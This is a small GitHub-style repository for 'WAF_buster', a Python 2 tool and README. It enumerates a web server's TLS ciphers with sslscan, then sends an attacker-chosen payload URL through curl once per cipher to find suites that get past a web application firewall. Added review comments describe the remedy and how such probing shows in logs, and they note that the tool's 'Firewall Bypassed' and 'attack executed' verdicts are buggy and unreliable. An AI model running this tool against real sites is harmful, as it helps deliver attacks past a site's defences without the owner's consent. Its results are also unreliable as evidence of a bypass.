├── README.md
├── WAF_buster.py
└── screenshots
    ├── waf.png
    └── woof.png


/README.md:
--------------------------------------------------------------------------------
# WAF_buster
Disrupt WAF by abusing SSL/TLS Ciphers

# About WAF_buster
This tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end.(Reference:https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html).It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that "Firewall is bypassed".

## Screenshots

![WAF_buster](https://raw.github.com/viperbluff/WAF_buster/master/screenshots/woof.png)


## Installation

> **git clone https://github.com/viperbluff/WAF_buster.git**

## Python2

This tool has been created using Python2 and below modules have been used throughout:-

1.requests

2.os

3.sys

4.subprocess

## Usage

> **Open terminal**

> **python2 WAF_buster.py --input**

![Usage](https://raw.github.com/viperbluff/WAF_buster/master/screenshots/waf.png)

## Credits

Sahil Tikoo

Hacker



--------------------------------------------------------------------------------
/WAF_buster.py:
--------------------------------------------------------------------------------
#!/usr/bin/python2

# Overview of what this script does, in order:
#   1. runs `sslscan` against the entered Domain and saves its output;
#   2. keeps the lines containing "Accepted" or "Preferred" and takes one
#      space-separated field from each as a cipher name;
#   3. for every cipher name, runs `curl --ciphers NAME` against the entered
#      Site_Payload URL and prints a verdict based on curl's stdout.
#
# The condition being probed (per the README) is a cipher that the web server
# negotiates but the WAF in front of it does not support.
# NOTE(review): the usual remedy is to keep the cipher list accepted by the
# web server no wider than what the WAF / TLS terminator can decrypt and
# inspect, and to make sure the server is not reachable around the WAF.
# Enumeration of this kind typically shows up in TLS logs as a run of
# handshakes from one client, each offering a single cipher suite.
#
# NOTE(review): the listing this file was taken from had lost its
# indentation. The nesting below is reconstructed; confirm it against the
# repository, in particular where the `else:` branch in ssl_check() ends.

import sys
import subprocess
import requests as re  # this is the requests library, not the stdlib regex module
import os

def banner():
    """Print the usage text."""
    print "[*]Usage: python WAF_buster.py --input"
    print "[*]Run this script only if the Payload_URL is getting blocked by firewall "

def check_response(argument):
    """Fetch `argument` with requests.get and return the HTTP status code.

    No timeout is passed to requests.get, and exceptions raised by requests
    are not caught here; they propagate to the caller.
    """
    f=re.get(argument)
    g=f.status_code
    return g

def ssl_check(Domain,Site_Payload,Payload):
    """Enumerate ciphers with sslscan, then replay Site_Payload once per cipher.

    Domain       -- passed as the single argument to `sslscan`.
    Site_Payload -- URL passed to `curl` and to check_response().
    Payload      -- string searched for in curl's stdout.

    Returns nothing; results are printed. Four scratch files with fixed names
    (file.txt, cipher.txt, escape_char_cipher.txt, final_cipher.txt) are
    written to the current working directory, overwritten on every run and
    never removed, so the script should be run from a private directory.
    """
    # argv is passed as a list, so no shell interprets the user-supplied value.
    file1=subprocess.Popen(["sslscan",Domain],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    output1,error1=file1.communicate()
    # Only stdout is inspected; error1 and the exit status are never read.
    if "Could not resolve hostname" in output1:
        print "Some issues occured , Please Try Again !!!"
        # Retry by recursion. When the nested main() returns, control comes
        # back here and this function carries on.
        main()
    else:
        open_file=open("file.txt",'w')
        open_file.write(output1)
        open_file.close()

    # NOTE(review): placed at function level (see the note at the top of the
    # file). If that is right, the resolve-failure path above falls through
    # to here and reads whatever file.txt an earlier run left behind.
    file_open=open("file.txt",'r')
    file22=open("cipher.txt",'w')

    # Keep only the sslscan lines that mention an accepted/preferred cipher.
    for line in file_open:
        if "Accepted" in line or "Preferred" in line:
            file22.write(line)
        else:
            continue

    file22.close()
    file_open.close()

    fi= open("escape_char_cipher.txt",'w')
    fm=open("cipher.txt",'r')

    # Pick the cipher-name column by fixed position: index 7 when the first
    # field contains "Accepted", index 6 otherwise. This depends on the exact
    # column layout sslscan prints.
    # NOTE(review): the guard skips only lines with fewer than 6 fields, so a
    # line with 6 fields (or 7 in the "Accepted" case) raises IndexError
    # here, outside the try block further down.
    for line in fm:
        line=line.split(' ')
        if len(line)<6:
            continue
        elif "Accepted" in line[0]:
            line=line[7]
            fi.write(line+"\n")
        else:
            line=line[6]
            fi.write(line+"\n")
    fm.close()
    fi.close()

    T1=open("escape_char_cipher.txt",'r')
    T2=open("final_cipher.txt",'w')

    # Remove the ANSI colour prefix sslscan puts in front of the name.
    # str.lstrip() treats its argument as a set of characters (ESC, '[', '3',
    # '2', 'm'), not as a literal prefix; that is why the "33m" branch works
    # although it passes the same "\x1b[32m" argument as the "32m" branch.
    for i in T1:
        if "32m" in i:
            i=i.lstrip("\x1b[32m")
            T2.write(i)
        elif "33m" in i:
            i=i.lstrip("\x1b[32m")
            T2.write(i)
        else:
            T2.write(i)
    T1.close()
    T2.close()

    # Verdict logic. Treat the printed result as unreliable:
    #   * `request` is the status code of a separate, plain requests.get() to
    #     Site_Payload, repeated for every cipher, rendered as text. It is
    #     matched as a substring of curl's stdout, so unrelated digits in the
    #     response can match.
    #   * error2 and curl's exit status are never checked. When curl fails
    #     and prints nothing to stdout, neither test matches and the final
    #     else still reports "Firewall Bypassed".
    #   * an empty Payload is a substring of every output, so the "attack
    #     executed" branch is taken whenever the first test does not match.
    #   * `i` is used exactly as read from the file, trailing newline
    #     included, both in the curl argument and in the printed message.
    try:
        cipher_open=open("final_cipher.txt",'r')
        for i in cipher_open:
            file2=subprocess.Popen(["curl","--ciphers",i,Site_Payload],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
            output2,error2=file2.communicate()
            request=str(check_response(Site_Payload))
            if request in output2:
                print "\n\033[32mFirewall blocked Cipher %s\033[0m" %i
            elif Payload in output2:
                print "\n\033[32mFirewall Bypassed using Cipher:%s\033[0m" %i
                print "And attack executed"
            else:
                print "\n\033[32mFirewall Bypassed using Cipher:%s\033[0m" %i
                print "But attack blocked"
        cipher_open.close()
    except Exception as ex:
        # Any failure in the loop (file, subprocess, requests) is printed and
        # the function returns; the file is not closed on this path.
        print ex

def main():
    """Prompt for the three inputs and hand them to ssl_check().

    Shows the usage text unless the first command-line argument is exactly
    "--input".
    """
    if len(sys.argv)<2:
        banner()
    elif sys.argv[1]!= "--input":
        banner()
    else:
        Domain=raw_input("[1] Enter The Domain Or Subdomain with http:// or https://:\t")
        # NOTE(review): with `or`, this is true for every value that lacks
        # the substring "https", so an http:// value is rejected as well. It
        # is a substring test, not a check of the URL scheme.
        if "http" not in Domain or "https" not in Domain:
            print "Please Specify the protocol Schema"
            # Re-prompt by recursion; after the nested main() returns,
            # execution continues below with the rejected value.
            main()
        Site_Payload=raw_input("[2] Enter The Domain Or Subdomain alongwith the Payload:\t")
        # NOTE(review): this repeats the test on Domain; Site_Payload itself
        # is not checked.
        if "http" not in Domain or "https" not in Domain:
            print "Please Specify the protocol Schema"
            main()
        Payload=raw_input("[3] Enter the Payload:\t")
        ssl_check(Domain,Site_Payload,Payload)
# Called unconditionally: there is no __main__ guard, so importing this
# module also starts the prompts.
main()

--------------------------------------------------------------------------------
/screenshots/waf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/viperbluff/WAF_buster/1cd5f795ec7dc4d68d2c5d76f3ee38afbde07379/screenshots/waf.png
--------------------------------------------------------------------------------
/screenshots/woof.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/viperbluff/WAF_buster/1cd5f795ec7dc4d68d2c5d76f3ee38afbde07379/screenshots/woof.png
--------------------------------------------------------------------------------